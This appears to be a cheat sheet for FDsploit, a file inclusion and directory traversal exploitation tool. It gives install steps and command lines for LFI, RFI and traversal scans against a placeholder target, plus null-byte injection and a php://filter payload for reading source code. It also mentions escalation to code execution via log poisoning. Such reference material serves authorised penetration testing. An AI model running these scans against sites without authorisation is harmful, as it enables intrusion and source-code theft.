Description
FDsploit is a file inclusion and directory traversal exploitation tool. It automates LFI/RFI scanning, supports multiple encoding/filter bypass methods, and can escalate LFI to remote code execution through log poisoning and PHP filter chains.
Installation
BASH
git clone https://github.com/chrispetrou/FDsploit.git
cd FDsploit
pip3 install -r requirements.txtBasic Usage
BASH
# LFI scan
python3 fdsploit.py -u "https://target.com/page?file=INJECT" -t lfi
# Directory traversal scan
python3 fdsploit.py -u "https://target.com/page?path=INJECT" -t dt
# RFI scan
python3 fdsploit.py -u "https://target.com/page?file=INJECT" -t rfiAdvanced Usage
BASH
# Custom depth
python3 fdsploit.py -u "https://target.com/page?file=INJECT" -t lfi -d 10
# PHP filter bypass (base64 decode source)
python3 fdsploit.py -u "https://target.com/page?file=INJECT" -t lfi --filter
# Null byte injection
python3 fdsploit.py -u "https://target.com/page?file=INJECT" -t lfi --null
# Custom cookies
python3 fdsploit.py -u "https://target.com/page?file=INJECT" -t lfi -c "session=abc"Common Workflows
BASH
# Test file parameter for LFI
python3 fdsploit.py -u "https://target.com/view?file=INJECT" -t lfi -d 8
# PHP filter chain for source code disclosure
# php://filter/convert.base64-encode/resource=index.php
python3 fdsploit.py -u "https://target.com/view?file=INJECT" -t lfi --filter